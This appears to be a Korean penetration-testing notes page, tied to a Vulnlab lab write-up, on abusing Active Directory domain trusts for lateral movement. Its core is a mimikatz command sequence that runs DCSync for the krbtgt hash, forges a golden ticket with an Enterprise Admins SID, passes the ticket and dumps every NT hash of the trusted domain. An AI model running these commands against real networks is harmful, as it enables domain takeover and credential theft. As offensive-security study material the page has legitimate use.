Domain Trust Discovery

도메인에 대한 관리자 권한 획득을 통해 골든 티켓을 획득할 수 있다면 서로 신뢰 관계인 다른 도메인의 NT Hash를 덤핑해서 도메인 측면 이동이 가능합니다. 이것이 가능한 이유는 도메인 간의 신뢰 관계가 양방향성 일 때, 권한이 있다면 다른 도메인의 리소스에 대한 접근 권한이 있기 때문입니다.

타 도메인의 NT Hash 덤핑은 mimikatz에서 사용 가능합니다. 우선 신뢰 관계의 도메인에 대해서 도메인 관리자 권한을 인증하기 위해 골든 티켓을 생성해줍니다. 다음은 전체 명령어에 대한 양식입니다.

:: mimikatz
# krbtgt의 NT Hash 획득
lsadump::dcsync /domain:lab.trusted.vl /all

# 신뢰 관계의 양측 도메인 SID 획득
# 타겟 도메인의 SID 결과값 마지막에 "-519" 추가
lsadump::trust

# Golden-Ticket 생성
kerberos::golden /user:Administrator /krbtgt:<HASH> /domain:<Target Domain> /sid:<SID> /sids:<Target SID>

# 생성된 티켓 등록
kerberos::ptt ticket.kirbi

# 티켓을 통한 타겟 도메인 NT Hash 덤핑
lsadump::dcsync /domain:<Target Domain> /dc:<Target FQDN> /all

References

LogoMicrosoft Entra Domain Services에서 트러스트의 작동 방식 - Microsoft Entra IDMicrosoftLearn
LogoTrusted | Vulnlab Write-UpMedium
PreviousPort ForwardingNextPass the Hash

Last updated

Was this helpful?